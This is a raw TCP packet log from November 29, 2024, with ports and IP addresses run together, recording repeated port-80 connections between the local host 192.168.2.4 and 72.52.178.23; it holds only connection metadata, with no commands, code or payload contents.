                                                                                Nov 29, 2024 01:52:59.001619101 CET804981772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:59.004241943 CET4981780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:59.117657900 CET804981772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:59.213685036 CET804981772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:59.214490891 CET4981780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:59.461615086 CET804981772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:59.462481976 CET4981780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:59.503746986 CET804981772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:59.503810883 CET4981780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:59.582427025 CET804981772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:59.623832941 CET804981772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:59.623843908 CET804981772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:59.623871088 CET804981772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:59.624003887 CET804981772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:59.624025106 CET804981772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:59.624134064 CET804981772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:59.624142885 CET804981772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:59.734289885 CET804981772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:59.734405041 CET4981780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:59.734445095 CET4981780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:52:59.854408979 CET804981772.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:52:59.907155037 CET4982480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:00.027440071 CET804982472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:00.027512074 CET4982480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:00.027614117 CET4982480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:00.027654886 CET4982480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:00.027726889 CET4982480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:00.027749062 CET4982480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:00.074620008 CET804981872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:00.074697971 CET4981880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:00.074731112 CET4981880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:00.147530079 CET804982472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:00.147804976 CET804982472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:00.147821903 CET804982472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:00.147831917 CET804982472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:00.147890091 CET4982480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:00.147943974 CET804982472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:00.147990942 CET804982472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:00.148052931 CET4982480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:00.148119926 CET804982472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:00.148180008 CET4982480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:00.148181915 CET804982472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:00.148225069 CET4982480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:00.148308992 CET804982472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:00.148348093 CET804982472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:00.148367882 CET4982480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:00.148395061 CET804982472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:00.148425102 CET4982480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:00.148447037 CET4982480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:00.148529053 CET804982472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:00.148581028 CET4982480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:00.190712929 CET4982580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:00.194749117 CET804981872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:00.267968893 CET804982472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:00.267992020 CET804982472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:00.268034935 CET4982480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:00.268045902 CET804982472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:00.268053055 CET4982480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:00.268057108 CET804982472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:00.268089056 CET4982480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:00.268100023 CET4982480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:00.309596062 CET804982472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:00.309746981 CET4982480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:00.310646057 CET804982572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:00.310725927 CET4982580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:00.310821056 CET4982580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:00.429637909 CET804982472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:00.429734945 CET4982480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:00.430704117 CET804982572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:00.477591038 CET804982472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:00.477653027 CET4982480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:00.593586922 CET804982472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:00.689615011 CET804982472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:00.689688921 CET4982480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:00.937686920 CET804982472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:00.937768936 CET4982480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:00.986731052 CET804982472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:00.986815929 CET4982480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:01.057740927 CET804982472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:01.106842995 CET804982472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:01.106905937 CET804982472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:01.107002020 CET804982472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:01.107050896 CET804982472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:01.107122898 CET804982472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:01.107183933 CET804982472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:01.107244015 CET804982472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:01.216408014 CET804982472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:01.216497898 CET4982480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:01.216571093 CET4982480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:01.336457014 CET804982472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:01.407161951 CET4982680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:01.527131081 CET804982672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:01.527209997 CET4982680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:01.527319908 CET4982680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:01.527390957 CET4982680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:01.527470112 CET4982680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:01.527493000 CET4982680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:01.539881945 CET804982572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:01.540030956 CET4982580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:01.540062904 CET4982580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:01.646085024 CET4982980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:01.647361994 CET804982672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:01.647382021 CET804982672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:01.647531986 CET804982672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:01.647542000 CET804982672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:01.647608995 CET4982680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:01.647650957 CET804982672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:01.647675991 CET804982672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:01.647731066 CET4982680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:01.647758961 CET804982672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:01.647789955 CET804982672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:01.647838116 CET4982680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:01.647913933 CET804982672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:01.647958994 CET804982672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:01.647979975 CET804982672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:01.648013115 CET4982680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:01.648013115 CET4982680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:01.648031950 CET804982672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:01.648222923 CET4982680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:01.659964085 CET804982572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:01.765983105 CET804982972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:01.766498089 CET4982980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:01.767679930 CET804982672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:01.767690897 CET804982672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:01.767749071 CET4982680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:01.767798901 CET804982672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:01.767823935 CET804982672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:01.767874002 CET4982680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:01.775747061 CET4982980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:01.813642979 CET804982672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:01.814601898 CET4982680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:01.895659924 CET804982972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:01.929651976 CET804982672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:01.930533886 CET4982680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:01.977861881 CET804982672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:01.978506088 CET4982680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:02.097640991 CET804982672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:02.193864107 CET804982672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:02.194511890 CET4982680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:02.437700987 CET804982672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:02.437762022 CET4982680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:02.480654955 CET804982672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:02.480716944 CET4982680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:02.480743885 CET4982680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:02.557893991 CET804982672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:02.600766897 CET804982672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:02.600780964 CET804982672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:02.600828886 CET804982672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:02.601068974 CET804982672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:02.601113081 CET804982672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:02.601191998 CET804982672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:02.601382971 CET804982672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:02.710305929 CET804982672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:02.710364103 CET4982680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:02.710407019 CET4982680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:02.830322027 CET804982672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:02.881932974 CET4983380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:02.950253010 CET804982972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:02.950391054 CET4982980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:02.950618029 CET4982980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:03.001965046 CET804983372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:03.002031088 CET4983380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:03.002723932 CET4983380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:03.002819061 CET4983380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:03.002876997 CET4983380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:03.002957106 CET4983380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:03.066030979 CET4983480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:03.070498943 CET804982972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:03.122824907 CET804983372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:03.122848988 CET804983372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:03.122859955 CET804983372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:03.122905016 CET4983380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:03.122960091 CET804983372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:03.122971058 CET804983372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:03.123017073 CET4983380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:03.123051882 CET804983372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:03.123090029 CET804983372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:03.123131990 CET4983380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:03.123193979 CET804983372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:03.123207092 CET804983372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:03.123245001 CET4983380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:03.123528957 CET804983372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:03.123538971 CET804983372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:03.123547077 CET804983372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:03.123589039 CET4983380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:03.123600006 CET4983380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:03.185997009 CET804983472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:03.186182976 CET4983480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:03.186316013 CET4983480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:03.242979050 CET804983372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:03.242989063 CET804983372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:03.243066072 CET4983380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:03.243197918 CET804983372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:03.243248940 CET804983372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:03.243251085 CET4983380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:03.243308067 CET4983380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:03.285615921 CET804983372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:03.285840988 CET4983380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:03.306484938 CET804983472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:03.405663967 CET804983372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:03.405749083 CET4983380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:03.449573040 CET804983372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:03.449950933 CET4983380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:03.569853067 CET804983372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:03.573491096 CET4983380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:03.737791061 CET804983372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:03.742508888 CET4983380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:03.949640036 CET804983372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:03.949693918 CET4983380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:03.994643927 CET804983372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:03.994705915 CET4983380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:04.069642067 CET804983372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:04.114782095 CET804983372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:04.114805937 CET804983372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:04.114850044 CET804983372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:04.114881992 CET804983372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:04.114955902 CET804983372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:04.114978075 CET804983372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:04.234750032 CET804983372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:04.234807968 CET4983380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:04.234899998 CET4983380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:04.354878902 CET804983372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:04.371310949 CET804983472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:04.372684002 CET4983480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:04.372812033 CET4983480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:04.453051090 CET4984080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:04.488204002 CET4984180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:04.492625952 CET804983472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:04.572984934 CET804984072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:04.576606989 CET4984080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:04.576699972 CET4984080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:04.576740980 CET4984080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:04.576807022 CET4984080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:04.576833963 CET4984080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:04.608249903 CET804984172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:04.608727932 CET4984180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:04.609155893 CET4984180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:04.696986914 CET804984072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:04.696996927 CET804984072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:04.697000980 CET804984072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:04.697063923 CET804984072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:04.697081089 CET804984072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:04.697134018 CET4984080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:04.697213888 CET804984072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:04.697259903 CET804984072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:04.697292089 CET4984080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:04.697307110 CET4984080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:04.697338104 CET804984072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:04.697359085 CET804984072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:04.697412014 CET4984080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:04.697511911 CET804984072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:04.697520018 CET804984072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:04.697541952 CET804984072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:04.697565079 CET4984080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:04.697578907 CET4984080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:04.729171038 CET804984172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:04.817375898 CET804984072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:04.817399979 CET804984072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:04.817473888 CET4984080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:04.817554951 CET804984072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:04.817605972 CET804984072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:04.817658901 CET4984080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:04.861659050 CET804984072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:04.862658024 CET4984080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:04.981640100 CET804984072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:04.981717110 CET4984080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:05.025577068 CET804984072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:05.025918007 CET4984080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:05.145585060 CET804984072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:05.239109993 CET804984072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:05.239191055 CET4984080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:05.485599041 CET804984072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:05.485647917 CET4984080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:05.531411886 CET804984072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:05.531474113 CET4984080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:05.605627060 CET804984072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:05.651537895 CET804984072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:05.651562929 CET804984072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:05.651653051 CET804984072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:05.651664972 CET804984072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:05.651734114 CET804984072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:05.651776075 CET804984072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:05.651818991 CET804984072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:05.760956049 CET804984072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:05.762259007 CET4984080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:05.763845921 CET4984080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:05.838891983 CET804984172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:05.839066029 CET4984180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:05.839111090 CET4984180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:05.883739948 CET804984072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:05.928515911 CET4984380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:05.941473007 CET4984480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:05.959009886 CET804984172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:06.048475981 CET804984372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:06.048609018 CET4984380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:06.048749924 CET4984380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:06.048820972 CET4984380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:06.049031973 CET4984380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:06.049060106 CET4984380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:06.061384916 CET804984472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:06.061472893 CET4984480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:06.061616898 CET4984480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:06.168798923 CET804984372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:06.168837070 CET804984372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:06.169025898 CET804984372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:06.169034004 CET804984372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:06.169092894 CET4984380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:06.169121981 CET804984372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:06.169147968 CET804984372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:06.169177055 CET4984380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:06.169203997 CET4984380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:06.169240952 CET804984372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:06.169250011 CET804984372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:06.169290066 CET4984380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:06.169339895 CET804984372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:06.169359922 CET804984372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:06.169393063 CET4984380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:06.169435978 CET804984372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:06.169457912 CET804984372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:06.169485092 CET4984380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:06.169508934 CET4984380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:06.181701899 CET804984472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:06.290205002 CET804984372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:06.290215969 CET804984372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:06.290222883 CET804984372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:06.290235996 CET804984372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:06.290280104 CET4984380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:06.337598085 CET804984372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:06.337850094 CET4984380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:06.453591108 CET804984372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:06.456574917 CET4984380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:06.501694918 CET804984372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:06.501904011 CET4984380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:06.617639065 CET804984372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:06.713668108 CET804984372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:06.714117050 CET4984380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:06.965730906 CET804984372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:06.965790033 CET4984380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:07.002756119 CET804984372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:07.002942085 CET4984380192.168.2.472.52.178.23
